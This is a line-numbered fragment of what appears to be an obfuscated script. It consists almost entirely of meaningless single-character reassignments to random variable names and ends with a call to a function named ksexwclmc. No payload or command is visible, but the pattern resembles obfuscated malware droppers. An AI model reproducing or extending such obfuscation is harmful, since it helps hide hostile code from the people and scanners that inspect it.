690 | wpsbia = "r"; | |
691 | wpsbia = "Q"; | |
692 | wpsbia = "H"; | |
693 | wpsbia = "U"; | |
694 | wpsbia = "q"; | |
695 | wpsbia = "z"; | |
696 | wpsbia = "v"; | |
697 | wpsbia = "/"; | |
698 | rolfii = "N"; | |
699 | rolfii = "J"; | |
700 | rolfii = "n"; | |
701 | rolfii = "J"; | |
702 | rolfii = "m"; | |
703 | rolfii = "R"; | |
704 | rolfii = "G"; | |
705 | rolfii = "K"; | |
706 | rolfii = "D"; | |
707 | rolfii = "c"; | |
708 | snxzutl = "l"; | |
709 | snxzutl = "L"; | |
710 | snxzutl = "I"; | |
711 | snxzutl = "T"; | |
712 | snxzutl = "f"; | |
713 | snxzutl = "u"; | |
714 | snxzutl = "E"; | |
715 | snxzutl = "h"; | |
716 | snxzutl = "V"; | |
717 | snxzutl = "g"; | |
718 | snxzutl = "z"; | |
719 | snxzutl = "R"; | |
720 | snxzutl = "o"; | |
721 | snxzutl = "M"; | |
722 | snxzutl = "e"; | |
723 | snxzutl = "r"; | |
724 | snxzutl = "B"; | |
725 | snxzutl = "I"; | |
726 | snxzutl = "f"; | |
727 | snxzutl = "q"; | |
728 | snxzutl = "G"; | |
729 | snxzutl = "v"; | |
730 | snxzutl = "J"; | |
731 | snxzutl = "g"; | |
732 | snxzutl = "e"; | |
733 | snxzutl = "Q"; | |
734 | snxzutl = "v"; | |
735 | snxzutl = "Y"; | |
736 | snxzutl = "d"; | |
737 | snxzutl = "S"; | |
738 | snxzutl = "e"; | |
739 | snxzutl = "F"; | |
740 | snxzutl = "x"; | |
741 | snxzutl = "X"; | |
742 | snxzutl = "h"; | |
743 | snxzutl = "W"; | |
744 | snxzutl = "b"; | |
745 | snxzutl = "C"; | |
746 | snxzutl = "n"; | |
747 | snxzutl = "A"; | |
748 | snxzutl = "&"; | |
749 | kxwxixzl = "L"; | |
750 | kxwxixzl = "E"; | |
751 | kxwxixzl = "q"; | |
752 | kxwxixzl = "b"; | |
753 | kxwxixzl = "s"; | |
754 | kxwxixzl = "y"; | |
755 | kxwxixzl = "o"; | |
756 | kxwxixzl = "M"; | |
757 | kxwxixzl = "n"; | |
758 | kxwxixzl = "W"; | |
759 | kxwxixzl = "m"; | |
760 | kxwxixzl = "Q"; | |
761 | kxwxixzl = "U"; | |
762 | kxwxixzl = "L"; | |
763 | kxwxixzl = "x"; | |
764 | kxwxixzl = "B"; | |
765 | kxwxixzl = "A"; | |
766 | kxwxixzl = "k"; | |
767 | kxwxixzl = "J"; | |
768 | kxwxixzl = "J"; | |
769 | kxwxixzl = "A"; | |
770 | kxwxixzl = "A"; | |
771 | kxwxixzl = "R"; | |
772 | kxwxixzl = "E"; | |
773 | kxwxixzl = "k"; | |
774 | kxwxixzl = "R"; | |
775 | kxwxixzl = "q"; | |
776 | kxwxixzl = "T"; | |
777 | kxwxixzl = "I"; | |
778 | kxwxixzl = "z"; | |
779 | kxwxixzl = "t"; | |
780 | gkjqbpg = "t"; | |
781 | gkjqbpg = "k"; | |
782 | gkjqbpg = "N"; | |
783 | gkjqbpg = "r"; | |
784 | gkjqbpg = "f"; | |
785 | gkjqbpg = "h"; | |
786 | gkjqbpg = "u"; | |
787 | gkjqbpg = "6"; | |
788 | cwpmkkwl = "Y"; | |
789 | cwpmkkwl = "J"; | |
790 | cwpmkkwl = "o"; | |
791 | cwpmkkwl = "W"; | |
792 | cwpmkkwl = "R"; | |
793 | cwpmkkwl = "X"; | |
794 | cwpmkkwl = "u"; | |
795 | cwpmkkwl = "i"; | |
796 | cwpmkkwl = "Y"; | |
797 | cwpmkkwl = "o"; | |
798 | cwpmkkwl = "C"; | |
799 | cwpmkkwl = "s"; | |
800 | cwpmkkwl = "e"; | |
801 | cwpmkkwl = "-"; | |
802 | spgviipxp = "W"; | |
803 | spgviipxp = "l"; | |
804 | spgviipxp = "T"; | |
805 | spgviipxp = "b"; | |
806 | spgviipxp = "d"; | |
807 | spgviipxp = "G"; | |
808 | spgviipxp = "q"; | |
809 | spgviipxp = "r"; | |
810 | spgviipxp = "J"; | |
811 | spgviipxp = "x"; | |
812 | spgviipxp = "z"; | |
813 | spgviipxp = "L"; | |
814 | spgviipxp = "o"; | |
815 | spgviipxp = "k"; | |
816 | spgviipxp = "B"; | |
817 | spgviipxp = "x"; | |
818 | spgviipxp = "N"; | |
819 | spgviipxp = "a"; | |
820 | spgviipxp = "m"; | |
821 | spgviipxp = "V"; | |
822 | spgviipxp = "K"; | |
823 | spgviipxp = "w"; | |
824 | spgviipxp = "i"; | |
825 | spgviipxp = "K"; | |
826 | spgviipxp = "n"; | |
827 | spgviipxp = "n"; | |
828 | spgviipxp = "N"; | |
829 | spgviipxp = "Y"; | |
830 | spgviipxp = "h"; | |
831 | spgviipxp = "X"; | |
832 | spgviipxp = "x"; | |
833 | spgviipxp = "E"; | |
834 | spgviipxp = "1"; | |
835 | tsybmnvsq = "Y"; | |
836 | wbzgdukp = "V"; | |
837 | wbzgdukp = "Y"; | |
838 | wbzgdukp = "l"; | |
839 | wbzgdukp = "P"; | |
840 | wbzgdukp = "G"; | |
841 | wbzgdukp = "q"; | |
842 | wbzgdukp = "r"; | |
843 | wbzgdukp = "p"; | |
844 | wbzgdukp = "F"; | |
845 | wbzgdukp = "p"; | |
846 | wbzgdukp = "g"; | |
847 | wbzgdukp = "V"; | |
848 | wbzgdukp = "V"; | |
849 | wbzgdukp = "P"; | |
850 | wbzgdukp = "e"; | |
851 | eieyqc = "t"; | |
852 | eieyqc = "X"; | |
853 | eieyqc = "I"; | |
854 | eieyqc = "L"; | |
855 | eieyqc = "B"; | |
856 | eieyqc = "J"; | |
857 | eieyqc = "Q"; | |
858 | eieyqc = "X"; | |
859 | eieyqc = "M"; | |
860 | eieyqc = "y"; | |
861 | eieyqc = "e"; | |
862 | eieyqc = "T"; | |
863 | eieyqc = "S"; | |
864 | eieyqc = "G"; | |
865 | eieyqc = "q"; | |
866 | eieyqc = "j"; | |
867 | eieyqc = "s"; | |
868 | eieyqc = "c"; | |
869 | eieyqc = "Y"; | |
870 | eieyqc = "t"; | |
871 | eieyqc = "j"; | |
872 | eieyqc = "U"; | |
873 | eieyqc = "n"; | |
874 | eieyqc = "b"; | |
875 | eieyqc = "E"; | |
876 | eieyqc = "J"; | |
877 | eieyqc = "Y"; | |
878 | eieyqc = "d"; | |
879 | eieyqc = "y"; | |
880 | eieyqc = "T"; | |
881 | eieyqc = "f"; | |
882 | eieyqc = "S"; | |
883 | eieyqc = "R"; | |
884 | eieyqc = "K"; | |
885 | eieyqc = "L"; | |
886 | eieyqc = "x"; | |
887 | eieyqc = "F"; | |
888 | eieyqc = "e"; | |
889 | eieyqc = "s"; | |
890 | eieyqc = "O"; | |
891 | eieyqc = "C"; | |
892 | xqjxluo = "s"; | |
893 | xqjxluo = "O"; | |
894 | xqjxluo = "e"; | |
895 | xqjxluo = "A"; | |
896 | xqjxluo = "p"; | |
897 | xqjxluo = "r"; | |
898 | xqjxluo = "l"; | |
899 | xqjxluo = "o"; | |
900 | xqjxluo = "k"; | |
901 | xqjxluo = "E"; | |
902 | xqjxluo = "h"; | |
903 | xqjxluo = "Y"; | |
904 | xqjxluo = "c"; | |
905 | xqjxluo = "f"; | |
906 | xqjxluo = "x"; | |
907 | xqjxluo = "u"; | |
908 | xqjxluo = "I"; | |
909 | xqjxluo = "l"; | |
910 | xqjxluo = "V"; | |
911 | xqjxluo = "M"; | |
912 | xqjxluo = "D"; | |
913 | xqjxluo = "L"; | |
914 | xqjxluo = "s"; | |
915 | xqjxluo = "V"; | |
916 | xqjxluo = "D"; | |
917 | xqjxluo = "r"; | |
918 | bkmosknb = "d"; | |
919 | bkmosknb = "f"; | |
920 | bkmosknb = "n"; | |
921 | bkmosknb = "G"; | |
922 | bkmosknb = "m"; | |
923 | bkmosknb = "9"; | |
924 | hfuhae = "v"; | |
925 | hfuhae = "f"; | |
926 | hfuhae = "I"; | |
927 | hfuhae = "Q"; | |
928 | avzdibkf = "R"; | |
929 | avzdibkf = "Y"; | |
930 | avzdibkf = "X"; | |
931 | avzdibkf = "D"; | |
932 | avzdibkf = "k"; | |
933 | avzdibkf = "P"; | |
934 | avzdibkf = "t"; | |
935 | avzdibkf = "s"; | |
936 | avzdibkf = "a"; | |
937 | avzdibkf = "o"; | |
938 | avzdibkf = "b"; | |
939 | avzdibkf = "j"; | |
940 | avzdibkf = "I"; | |
941 | avzdibkf = "P"; | |
942 | avzdibkf = "X"; | |
943 | avzdibkf = "u"; | |
944 | avzdibkf = "B"; | |
945 | avzdibkf = "s"; | |
946 | avzdibkf = "t"; | |
947 | avzdibkf = "w"; | |
948 | avzdibkf = "b"; | |
949 | avzdibkf = "q"; | |
950 | avzdibkf = "j"; | |
951 | avzdibkf = "s"; | |
952 | avzdibkf = "Q"; | |
953 | avzdibkf = "S"; | |
954 | avzdibkf = "P"; | |
955 | avzdibkf = "\\"; | |
956 | wgaflu = "o"; | |
957 | wgaflu = "A"; | |
958 | wgaflu = "T"; | |
959 | wgaflu = "V"; | |
960 | wgaflu = "A"; | |
961 | wgaflu = "x"; | |
962 | wgaflu = "Q"; | |
963 | wgaflu = "V"; | |
964 | wgaflu = "x"; | |
965 | wgaflu = "G"; | |
966 | wgaflu = "T"; | |
967 | wgaflu = "N"; | |
968 | wgaflu = "y"; | |
969 | wgaflu = "w"; | |
970 | wgaflu = "I"; | |
971 | wgaflu = "p"; | |
972 | wgaflu = "S"; | |
973 | wgaflu = "O"; | |
974 | wgaflu = "m"; | |
975 | wgaflu = "L"; | |
976 | wgaflu = "e"; | |
977 | wgaflu = "p"; | |
978 | wgaflu = "w"; | |
979 | wgaflu = "l"; | |
980 | fkfypc = "s"; | |
981 | fkfypc = "g"; | |
982 | fkfypc = "F"; | |
983 | fkfypc = "p"; | |
984 | hinshjjh = "u"; | |
985 | hinshjjh = "T"; | |
986 | hinshjjh = "y"; | |
987 | hinshjjh = "Q"; | |
988 | hinshjjh = "f"; | |
989 | hinshjjh = "d"; | |
990 | hinshjjh = "Z"; | |
991 | hinshjjh = "Q"; | |
992 | hinshjjh = "V"; | |
993 | hinshjjh = "R"; | |
994 | hinshjjh = "g"; | |
995 | hinshjjh = "s"; | |
996 | hinshjjh = "W"; | |
997 | hinshjjh = "b"; | |
998 | hinshjjh = "M"; | |
999 | hinshjjh = "W"; | |
1000 | hinshjjh = "T"; | |
1001 | hinshjjh = "K"; | |
1002 | hinshjjh = "Y"; | |
1003 | hinshjjh = "S"; | |
1004 | bcpudoy = "V"; | |
1005 | bcpudoy = "T"; | |
1006 | bcpudoy = "t"; | |
1007 | bcpudoy = "O"; | |
1008 | bcpudoy = "w"; | |
1009 | bcpudoy = "R"; | |
1010 | bcpudoy = "y"; | |
1011 | bcpudoy = "%"; | |
1012 | hbkhrpfkl = "o"; | |
1013 | hbkhrpfkl = "v"; | |
1014 | hbkhrpfkl = "V"; | |
1015 | hbkhrpfkl = "v"; | |
1016 | hbkhrpfkl = "E"; | |
1017 | hbkhrpfkl = "J"; | |
1018 | hbkhrpfkl = "T"; | |
1019 | hbkhrpfkl = "3"; | |
1020 | wwopynr = "w"; | |
1021 | wwopynr = "G"; | |
1022 | wwopynr = "B"; | |
1023 | wwopynr = "h"; | |
1024 | wwopynr = "u"; | |
1025 | wwopynr = "E"; | |
1026 | wwopynr = "v"; | |
1027 | wwopynr = "m"; | |
1028 | wwopynr = "T"; | |
1029 | wwopynr = "Q"; | |
1030 | wwopynr = "Z"; | |
1031 | wwopynr = "m"; | |
1032 | wwopynr = "l"; | |
1033 | wwopynr = "b"; | |
1034 | wwopynr = "m"; | |
1035 | wwopynr = "N"; | |
1036 | wwopynr = "y"; | |
1037 | wwopynr = "n"; | |
1038 | wwopynr = "b"; | |
1039 | wwopynr = "u"; | |
1040 | wwopynr = "Q"; | |
1041 | wwopynr = "O"; | |
1042 | wwopynr = "T"; | |
1043 | wwopynr = "V"; | |
1044 | wwopynr = "d"; | |
1045 | wwopynr = "n"; | |
1046 | wwopynr = "l"; | |
1047 | wwopynr = "U"; | |
1048 | wwopynr = "n"; | |
1049 | wwopynr = "s"; | |
1050 | wwopynr = "r"; | |
1051 | wwopynr = "W"; | |
1052 | wwopynr = "j"; | |
1053 | wwopynr = "l"; | |
1054 | wwopynr = "e"; | |
1055 | wwopynr = "T"; | |
1056 | wwopynr = "I"; | |
1057 | wwopynr = "m"; | |
1058 | wwopynr = "c"; | |
1059 | wwopynr = "E"; | |
1060 | nxnnw = "s"; | |
1061 | nxnnw = "b"; | |
1062 | nxnnw = "A"; | |
1063 | nxnnw = "t"; | |
1064 | nxnnw = "o"; | |
1065 | nxnnw = "d"; | |
1066 | nxnnw = "W"; | |
1067 | lqvmupgq = "l"; | |
1068 | lqvmupgq = "X"; | |
1069 | lqvmupgq = "P"; | |
1070 | lqvmupgq = "m"; | |
1071 | lqvmupgq = "m"; | |
1072 | lqvmupgq = "E"; | |
1073 | lqvmupgq = "S"; | |
1074 | lqvmupgq = "h"; | |
1075 | ikxpvvbf = "c"; | |
1076 | ikxpvvbf = "m"; | |
1077 | ikxpvvbf = "o"; | |
1078 | ikxpvvbf = "E"; | |
1079 | ikxpvvbf = "G"; | |
1080 | ikxpvvbf = "r"; | |
1081 | ikxpvvbf = "w"; | |
1082 | ikxpvvbf = "I"; | |
1083 | ikxpvvbf = "k"; | |
1084 | ikxpvvbf = "N"; | |
1085 | ikxpvvbf = "v"; | |
1086 | ikxpvvbf = "u"; | |
1087 | ikxpvvbf = "v"; | |
1088 | fskogd = "i"; | |
1089 | fskogd = "J"; | |
1090 | fskogd = "C"; | |
1091 | fskogd = "T"; | |
1092 | fskogd = "s"; | |
1093 | fskogd = "j"; | |
1094 | fskogd = "x"; | |
1095 | fskogd = "L"; | |
1096 | fskogd = "w"; | |
1097 | fskogd = "o"; | |
1098 | fskogd = "G"; | |
1099 | fskogd = "q"; | |
1100 | fskogd = "u"; | |
1101 | fskogd = "L"; | |
1102 | dgulpegn = "l"; | |
1103 | dgulpegn = "W"; | |
1104 | dgulpegn = "e"; | |
1105 | dgulpegn = "S"; | |
1106 | dgulpegn = "A"; | |
1107 | dgulpegn = "T"; | |
1108 | dgulpegn = "V"; | |
1109 | dgulpegn = "q"; | |
1110 | dgulpegn = "D"; | |
1111 | dgulpegn = "a"; | |
1112 | dgulpegn = "O"; | |
1113 | dgulpegn = "s"; | |
1114 | dgulpegn = "r"; | |
1115 | dgulpegn = "s"; | |
1116 | dgulpegn = "j"; | |
1117 | dgulpegn = "M"; | |
1118 | dgulpegn = "r"; | |
1119 | dgulpegn = "B"; | |
1120 | dgulpegn = "z"; | |
1121 | dgulpegn = "b"; | |
1122 | dgulpegn = "S"; | |
1123 | dgulpegn = "s"; | |
1124 | dgulpegn = "E"; | |
1125 | dgulpegn = "P"; | |
1126 | dgulpegn = "v"; | |
1127 | dgulpegn = "c"; | |
1128 | dgulpegn = "X"; | |
1129 | dgulpegn = "L"; | |
1130 | dgulpegn = "v"; | |
1131 | dgulpegn = "b"; | |
1132 | dgulpegn = "H"; | |
1133 | dgulpegn = "a"; | |
1134 | dgulpegn = "V"; | |
1135 | dgulpegn = "d"; | |
1136 | dgulpegn = "z"; | |
1137 | dgulpegn = "K"; | |
1138 | dgulpegn = "T"; | |
1139 | xxlfb = "e"; | |
1140 | xxlfb = "o"; | |
1141 | xxlfb = "A"; | |
1142 | xxlfb = "Q"; | |
1143 | xxlfb = "r"; | |
1144 | xxlfb = "A"; | |
1145 | xxlfb = "t"; | |
1146 | xxlfb = "M"; | |
1147 | xxlfb = "E"; | |
1148 | xxlfb = "F"; | |
1149 | xxlfb = "t"; | |
1150 | xxlfb = "L"; | |
1151 | xxlfb = "n"; | |
1152 | xxlfb = "V"; | |
1153 | xxlfb = "o"; | |
1154 | xxlfb = "i"; | |
1155 | xxlfb = "O"; | |
1156 | xxlfb = "d"; | |
1157 | xxlfb = "k"; | |
1158 | xxlfb = "l"; | |
1159 | xxlfb = "I"; | |
1160 | xxlfb = "r"; | |
1161 | xxlfb = "d"; | |
1162 | xxlfb = "H"; | |
1163 | xxlfb = "p"; | |
1164 | xxlfb = "H"; | |
1165 | xxlfb = "r"; | |
1166 | xxlfb = " "; | |
1167 | heuxk = "e"; | |
1168 | heuxk = "k"; | |
1169 | heuxk = "j"; | |
1170 | heuxk = "y"; | |
1171 | heuxk = "U"; | |
1172 | heuxk = "y"; | |
1173 | heuxk = "Z"; | |
1174 | heuxk = "r"; | |
1175 | heuxk = "p"; | |
1176 | heuxk = "j"; | |
1177 | heuxk = "C"; | |
1178 | heuxk = "b"; | |
1179 | heuxk = "R"; | |
1180 | heuxk = "i"; | |
1181 | heuxk = "N"; | |
1182 | heuxk = "D"; | |
1183 | heuxk = "c"; | |
1184 | heuxk = "S"; | |
1185 | heuxk = "S"; | |
1186 | heuxk = "e"; | |
1187 | heuxk = "V"; | |
1188 | heuxk = "P"; | |
1189 | heuxk = "x"; | |
1190 | heuxk = "L"; | |
1191 | heuxk = "t"; | |
1192 | heuxk = "b"; | |
1193 | heuxk = "S"; | |
1194 | heuxk = "y"; | |
1195 | heuxk = "y"; | |
1196 | heuxk = "u"; | |
1197 | heuxk = "J"; | |
1198 | heuxk = "j"; | |
1199 | heuxk = "X"; | |
1200 | heuxk = "m"; | |
1201 | heuxk = "u"; | |
1202 | heuxk = "P"; | |
1203 | heuxk = "i"; | |
1204 | heuxk = "o"; | |
1205 | heuxk = "v"; | |
1206 | heuxk = "C"; | |
1207 | heuxk = "E"; | |
1208 | heuxk = "o"; | |
1209 | ewcuonofo = "O"; | |
1210 | ewcuonofo = "o"; | |
1211 | ewcuonofo = "z"; | |
1212 | ewcuonofo = "i"; | |
1213 | ewcuonofo = "i"; | |
1214 | ewcuonofo = "s"; | |
1215 | ewcuonofo = "d"; | |
1216 | ewcuonofo = "N"; | |
1217 | ewcuonofo = "E"; | |
1218 | ewcuonofo = "j"; | |
1219 | ewcuonofo = "O"; | |
1220 | ewcuonofo = "M"; | |
1221 | ewcuonofo = "a"; | |
1222 | ewcuonofo = "y"; | |
1223 | ewcuonofo = "h"; | |
1224 | ewcuonofo = "f"; | |
1225 | ewcuonofo = "H"; | |
1226 | ewcuonofo = "y"; | |
1227 | ewcuonofo = "g"; | |
1228 | ewcuonofo = "L"; | |
1229 | ewcuonofo = "C"; | |
1230 | ewcuonofo = "N"; | |
1231 | ewcuonofo = "W"; | |
1232 | ewcuonofo = "k"; | |
1233 | ewcuonofo = "t"; | |
1234 | ewcuonofo = "s"; | |
1235 | ewcuonofo = "K"; | |
1236 | ewcuonofo = "Z"; | |
1237 | ewcuonofo = "n"; | |
1238 | ewcuonofo = "i"; | |
1239 | ewcuonofo = "t"; | |
1240 | ewcuonofo = "j"; | |
1241 | ewcuonofo = "O"; | |
1242 | ewcuonofo = "x"; | |
1243 | ewcuonofo = "x"; | |
1244 | ewcuonofo = "i"; | |
1245 | ewcuonofo = "p"; | |
1246 | ewcuonofo = "W"; | |
1247 | ewcuonofo = "o"; | |
1248 | ewcuonofo = "B"; | |
1249 | ewcuonofo = "T"; | |
1250 | ewcuonofo = "b"; | |
1251 | ewcuonofo = "L"; | |
1252 | ewcuonofo = "o"; | |
1253 | ewcuonofo = "K"; | |
1254 | ywyzkqwwr = "D"; | |
1255 | ywyzkqwwr = "n"; | |
1256 | ywyzkqwwr = "C"; | |
1257 | ywyzkqwwr = "K"; | |
1258 | ywyzkqwwr = "L"; | |
1259 | ywyzkqwwr = "K"; | |
1260 | ywyzkqwwr = "o"; | |
1261 | ywyzkqwwr = "S"; | |
1262 | ywyzkqwwr = "e"; | |
1263 | ywyzkqwwr = "p"; | |
1264 | ywyzkqwwr = "L"; | |
1265 | ywyzkqwwr = "B"; | |
1266 | ywyzkqwwr = "u"; | |
1267 | ywyzkqwwr = "k"; | |
1268 | ywyzkqwwr = "Z"; | |
1269 | ywyzkqwwr = "e"; | |
1270 | ywyzkqwwr = "j"; | |
1271 | ywyzkqwwr = "V"; | |
1272 | ywyzkqwwr = "A"; | |
1273 | ywyzkqwwr = "k"; | |
1274 | ywyzkqwwr = "G"; | |
1275 | ywyzkqwwr = "s"; | |
1276 | ywyzkqwwr = "q"; | |
1277 | ywyzkqwwr = "s"; | |
1278 | ywyzkqwwr = "h"; | |
1279 | ywyzkqwwr = "C"; | |
1280 | ywyzkqwwr = "c"; | |
1281 | ywyzkqwwr = "p"; | |
1282 | ywyzkqwwr = "w"; | |
1283 | ywyzkqwwr = "H"; | |
1284 | ywyzkqwwr = "R"; | |
1285 | ywyzkqwwr = "j"; | |
1286 | ywyzkqwwr = "I"; | |
1287 | ywyzkqwwr = "F"; | |
1288 | ywyzkqwwr = "v"; | |
1289 | ywyzkqwwr = ":"; | |
1290 | tlwae = "W"; | |
1291 | tlwae = "T"; | |
1292 | tlwae = "z"; | |
1293 | tlwae = "a"; | |
1294 | tlwae = "R"; | |
1295 | tlwae = "u"; | |
1296 | tlwae = "p"; | |
1297 | tlwae = "q"; | |
1298 | tlwae = "y"; | |
1299 | tlwae = "i"; | |
1300 | tlwae = "X"; | |
1301 | tlwae = "g"; | |
1302 | tlwae = "I"; | |
1303 | tlwae = "L"; | |
1304 | tlwae = "z"; | |
1305 | tlwae = "D"; | |
1306 | tlwae = "Y"; | |
1307 | tlwae = "S"; | |
1308 | tlwae = "i"; | |
1309 | tlwae = "b"; | |
1310 | tlwae = "e"; | |
1311 | tlwae = "R"; | |
1312 | kdvaey = "r"; | |
1313 | kdvaey = "r"; | |
1314 | kdvaey = "v"; | |
1315 | kdvaey = "T"; | |
1316 | kdvaey = "d"; | |
1317 | kdvaey = "l"; | |
1318 | kdvaey = "A"; | |
1319 | kdvaey = "B"; | |
1320 | kdvaey = "M"; | |
1321 | kdvaey = "c"; | |
1322 | kdvaey = "N"; | |
1323 | kdvaey = "P"; | |
1324 | kdvaey = "I"; | |
1325 | kdvaey = "w"; | |
1326 | kdvaey = "C"; | |
1327 | kdvaey = "A"; | |
1328 | kdvaey = "q"; | |
1329 | kdvaey = "V"; | |
1330 | kdvaey = "C"; | |
1331 | kdvaey = "C"; | |
1332 | kdvaey = "Q"; | |
1333 | kdvaey = "t"; | |
1334 | kdvaey = "W"; | |
1335 | kdvaey = "x"; | |
1336 | kdvaey = "X"; | |
1337 | kdvaey = "C"; | |
1338 | kdvaey = "m"; | |
1339 | kdvaey = "S"; | |
1340 | kdvaey = "B"; | |
1341 | kdvaey = "y"; | |
1342 | kdvaey = "s"; | |
1343 | kdvaey = "d"; | |
1344 | kdvaey = "Y"; | |
1345 | kdvaey = "c"; | |
1346 | kdvaey = "G"; | |
1347 | kdvaey = "_"; | |
1348 | jucqi = "J"; | |
1349 | jucqi = "U"; | |
1350 | jucqi = "W"; | |
1351 | jucqi = "Y"; | |
1352 | jucqi = "z"; | |
1353 | jucqi = "M"; | |
1354 | jucqi = "K"; | |
1355 | jucqi = "S"; | |
1356 | jucqi = "y"; | |
1357 | jucqi = "d"; | |
1358 | jucqi = "d"; | |
1359 | ksexwclmc ( ); |
|